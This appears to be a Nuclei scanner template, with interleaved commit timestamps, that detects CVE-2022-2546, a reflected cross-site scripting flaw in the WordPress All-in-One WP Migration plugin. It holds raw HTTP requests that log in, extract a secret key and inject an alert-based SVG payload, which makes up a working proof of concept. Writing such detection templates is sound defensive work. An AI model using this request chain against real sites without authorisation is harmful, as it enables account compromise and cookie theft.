2022-09-25 07:25:10 +00:00
id : CVE-2022-2546
info :
2022-10-10 19:22:59 +00:00
name : WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting
2022-09-25 07:25:10 +00:00
author : theamanrawat
severity : medium
description : |
2022-10-10 19:22:59 +00:00
WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation : |
Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability.
2022-09-25 07:25:10 +00:00
reference :
- https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
- https://wordpress.org/plugins/all-in-one-wp-migration/
- https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-2546
classification :
2023-02-10 16:02:02 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 4.7
2022-09-25 07:25:10 +00:00
cve-id : CVE-2022-2546
2023-02-10 16:02:02 +00:00
cwe-id : CWE-79
2023-11-06 12:42:20 +00:00
epss-score : 0.00198
2023-11-20 05:10:39 +00:00
epss-percentile : 0.57541
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:*
2022-09-25 07:25:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : servmask
product : all-in-one_wp_migration
2023-09-06 11:59:08 +00:00
framework : wordpress
2022-09-26 07:02:03 +00:00
tags : cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss
2022-09-25 07:25:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-25 07:25:10 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-09-25 09:33:33 +00:00
2022-09-25 07:25:10 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
Host : {{Hostname}}
- |
GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- contains(header_3, "text/html")
2022-09-25 07:25:10 +00:00
- status_code_3 == 200
- contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
condition : and
extractors :
- type : regex
name : secretkey
group : 1
regex :
- 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
2022-09-25 09:33:33 +00:00
internal : true
2023-11-20 06:35:10 +00:00
# digest: 4a0a00473045022001ce8790c0a5396657ccd35be139eadcc8b79baf135ba645f6bae7546b558c48022100d9b4bbed43278ab57326dfba3938315e1a64d94e98553306771da5bbb620bec2:922c64590222798bb761d5b6d8e72950